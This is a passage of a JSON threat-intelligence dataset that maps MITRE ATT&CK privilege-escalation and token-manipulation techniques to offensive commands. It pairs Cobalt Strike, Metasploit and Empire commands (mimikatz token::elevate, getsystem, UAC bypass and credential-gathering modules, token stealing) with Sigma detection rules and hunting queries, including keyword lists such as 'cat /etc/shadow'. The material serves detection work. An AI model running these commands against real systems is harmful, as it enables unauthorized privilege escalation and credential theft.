"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://github.com/PowerShellEmpire/Empire", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "Priv Esc:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Priv Esc:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "", + "command_list": [ + "mimikatz token::elevate\nor\nelevate", + "post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend" + ], + "commands": [ + { + "command": "mimikatz token::elevate\nor\nelevate", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "mimikatz token::elevate\nor\nelevate", + "Metasploit": "", + "Description": "If you already have a high integrity administrative process, this technique will get you SYSTEM. This is useful to bypass certain logging." + }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "post/windows/gather/credentials/gpp\npost/windows/gather/credentials/outlook\npost/windows/gather/credentials/enum_cred_store\npost/windows/gather/enum_unattend", + "Description": "These modules look for common places where passwords are stored either in plaintext or where the encryption keys are widely published for easy decryption." + }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + }, + { + "Category": "", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1068", + "command_list": [ + "getsystem", + "bitsadmin.exe", + "msbuild.exe *MSBuildShell.csproj", + "powershell/privesc/ms16-032", + "powershell/privesc/tater", + "powershell/privesc/ms16-135" + ], + "commands": [ + { + "command": "getsystem", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "getsystem", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "bitsadmin.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "msbuild.exe *MSBuildShell.csproj", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/privesc/ms16-032", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/tater", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/ms16-135", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1068", + "Built-in Windows Command": "", + "Cobalt Strike": "getsystem", + "Metasploit": "getsystem", + "Description": "This technique tries a series of exploits to elevate to a SYSTEM level process (these are actual exploits, not trust abuses, so there's always the potential for bluescreening)" + }, + { + "chain_id": "100013", + "os": "windows", + "parent_process": "bitsadmin.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "file_transfer", + "mitre_attack": "T1068", + "itw_sample": "https://www.joesecurity.org/reports/report-1144eeaebb15044fa64f4d9bb5670349.html#startup" + }, + { + "chain_id": "100041", + "os": "windows", + "parent_process": "msbuild.exe", + "commandline_string": "*MSBuildShell.csproj", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "vulnerability_exploit", + "mitre_attack": "T1068", + "itw_sample": "https://github.com/Cn33liz/MSBuildShell/blob/master/MSBuildShell.csproj" + }, + { + "Empire Module": "powershell/privesc/ms16-032", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/ms16-032\": [\"T1068\"]," + }, + { + "Empire Module": "powershell/privesc/tater", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/tater\": [\"T1068\"]," + }, + { + "Empire Module": "powershell/privesc/ms16-135", + "ATT&CK Technique #1": "T1068", + "ATT&CK Technique #2": "", + "Technique": "Exploitation for Privilege Escalation", + "Concatenate for Python Dictionary": "\"powershell/privesc/ms16-135\": [\"T1068\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Hurricane Panda Activity", + "id": "0eb2107b-a596-422e-b123-b389d5594ed7", + "author": "Florian Roth", + "status": "experimental", + "description": "Detects Hurricane Panda Activity", + "references": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* localgroup administrators admin /add", + "*\\Win64.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Privilege Escalation Preparation", + "id": "444ade84-c362-4260-b1f3-e45e20e1a905", + "status": "experimental", + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "references": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/" + ], + "author": "Patrick Bareiss", + "date": "2019/04/05", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "level": "medium", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "cat /etc/issue", + "cat /etc/*-release", + "cat /proc/version", + "uname -a", + "uname -mrs", + "rpm -q kernel", + "dmesg | grep Linux", + "ls /boot | grep vmlinuz-", + "cat /etc/profile", + "cat /etc/bashrc", + "cat ~/.bash_profile", + "cat ~/.bashrc", + "cat ~/.bash_logout", + "ps -aux | grep root", + "ps -ef | grep root", + "crontab -l", + "cat /etc/cron*", + "cat /etc/cron.allow", + "cat /etc/cron.deny", + "cat /etc/crontab", + "grep -i user *", + "grep -i pass *", + "ifconfig", + "cat /etc/network/interfaces", + "cat /etc/sysconfig/network", + "cat /etc/resolv.conf", + "cat /etc/networks", + "iptables -L", + "lsof -i", + "netstat -antup", + "netstat -antpx", + "netstat -tulpn", + "arp -e", + "route", + "cat /etc/passwd", + "cat /etc/group", + "cat /etc/shadow", + "find / -perm -u=s", + "find / -perm -g=s", + "find / -perm -4000", + "find / -perm -2000" + ], + "timeframe": "30m", + "condition": "keywords | count() by host > 6" + }, + "falsepositives": [ + "Troubleshooting on Linux Machines" + ] + }, + { + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "experimental", + "description": "Detects an explotation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "references": [ + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege" + ], + "author": "Florian Roth", + "date": "2019/11/20", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\consent.exe", + "Image": "*\\iexplore.exe", + "CommandLine": "* http*" + }, + "rights1": { + "IntegrityLevel": "System" + }, + "rights2": { + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and ( rights1 or rights2 )" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Windows Kernel and 3rd-party drivers exploits. Token stealing", + "id": "8065b1b4-1778-4427-877f-6bf948b26d38", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level", + "references": [ + "https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "status": "experimental", + "author": "Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule)", + "date": "2019/06/03", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentIntegrityLevel": "Medium", + "IntegrityLevel": "System", + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "enrichment": [ + "EN_0001_cache_sysmon_event_id_1_info", + "EN_0002_enrich_sysmon_event_id_1_with_parent_info" + ] + }, + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "Application Logs" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "Application Logs" + ], + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.justice.gov/file/1080281/download", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1088", + "command_list": [ + "uacbypass", + "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "eventvwr.exe", + "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "mshta.exe", + "verclsid.exe", + "winword.exe", + "*.exe reg query", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command", + "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "\\Software\\Classes\\ms-settings\\shell\\open\\command", + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe", + "powershell/privesc/ask", + "powershell/privesc/bypassuac", + "powershell/privesc/bypassuac_eventvwr", + "powershell/privesc/bypassuac_wscript", + "powershell/privesc/bypassuac_env", + "powershell/privesc/bypassuac_fodhelper", + "powershell/privesc/bypassuac_sdctlbypass", + "powershell/privesc/bypassuac_tokenmanipulation" + ], + "commands": [ + { + "command": "uacbypass", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "eventvwr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "verclsid.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.exe reg query", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\Software\\Classes\\ms-settings\\shell\\open\\command", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "powershell/privesc/ask", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_eventvwr", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_wscript", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_env", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_fodhelper", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_sdctlbypass", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_tokenmanipulation", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1088", + "Built-in Windows Command": "", + "Cobalt Strike": "uacbypass", + "Metasploit": "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "Description": "If you have a medium integrity process, but are an administrator, UACBypass will get you a high integrity process without prompting the user for confirmation." + }, + { + "chain_id": "100012", + "os": "windows", + "parent_process": "eventvwr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100024", + "os": "windows", + "parent_process": "eventvwr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100047", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "verclsid.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "https://www.redcanary.com/blog/verclsid-exe-threat-detection/" + }, + { + "chain_id": "100096", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "verclsid.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100203", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg query", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "name": "UAC bypass", + "description": null, + "level": "high", + "phase": "Privilege Escalation", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Software\\Classes\\ms-settings\\shell\\open\\command" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Software\\Classes\\ms-settings\\shell\\open\\command" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/privesc/ask", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/ask\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_eventvwr", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_eventvwr\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_wscript", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_wscript\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_env", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_env\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_fodhelper", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_fodhelper\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_sdctlbypass", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_sdctlbypass\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_tokenmanipulation", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_tokenmanipulation\": [\"T1088\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains \"eventvwr.exe\"or process_parent_command_line contains \"fodhelper.exe\"or process_path contains \"ShellRunas.exe\")", + "name": "Bypass User Account Control Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\mscfile\\\\shell\\\\open\\\\command\\\\*\"or registry_key_path contains \"*\\\\ms-settings\\\\shell\\\\open\\\\command\\\\*\")", + "name": "Bypass User Account Control Registry" + } + ], + "possible_detections": [ + { + "title": "UAC Bypass via Event Viewer", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "status": "experimental", + "description": "Detects UAC bypass method using Windows event viewer", + "references": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "methregistry": { + "EventID": 13, + "TargetObject": "HKEY_USERS\\\\*\\mscfile\\shell\\open\\command" + }, + "methprocess": { + "EventID": 1, + "ParentImage": "*\\eventvwr.exe" + }, + "filterprocess": { + "Image": "*\\mmc.exe" + }, + "condition": "methregistry or ( methprocess and not filterprocess )" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "UAC Bypass via sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects changes to HKCU:\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "references": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + ], + "author": "Omer Yampel", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": "HKEY_USERS\\\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "experimental", + "description": "Detects some Empire PowerShell UAC bypass methods", + "references": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64" + ], + "author": "Ecco", + "date": "2019/08/30", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)*", + "* -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "System calls" + ] + ], + "external_reference": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.group-ib.com/blog/cobalt" + ] + }, + { + "technique_id": "Credentials:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Credentials:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1134", + "command_list": [ + "Token Stealing:\nsteal_token pid#", + "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "powershell/credentials/tokens", + "powershell/management/runas", + "powershell/privesc/getsystem" + ], + "commands": [ + { + "command": "Token Stealing:\nsteal_token pid#", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/credentials/tokens", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/runas", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/getsystem", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1134", + "Built-in Windows Command": "", + "Cobalt Strike": "Token Stealing:\nsteal_token pid#", + "Metasploit": "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "Description": "This steals the access token from another process and uses it to gain access to other services or computers. In Cobalt Strike, this token is only used when accessing remote systems, but in Meterpreter, this token is used for everything until it's dropped via rev2self. You need to be in a high integrity process for this to work." + }, + { + "Empire Module": "powershell/credentials/tokens", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/credentials/tokens\": [\"T1134\"]," + }, + { + "Empire Module": "powershell/management/runas", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/management/runas\": [\"T1134\"]," + }, + { + "Empire Module": "powershell/privesc/getsystem", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/privesc/getsystem\": [\"T1134\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "Access Tokens" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "Access Tokens" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + 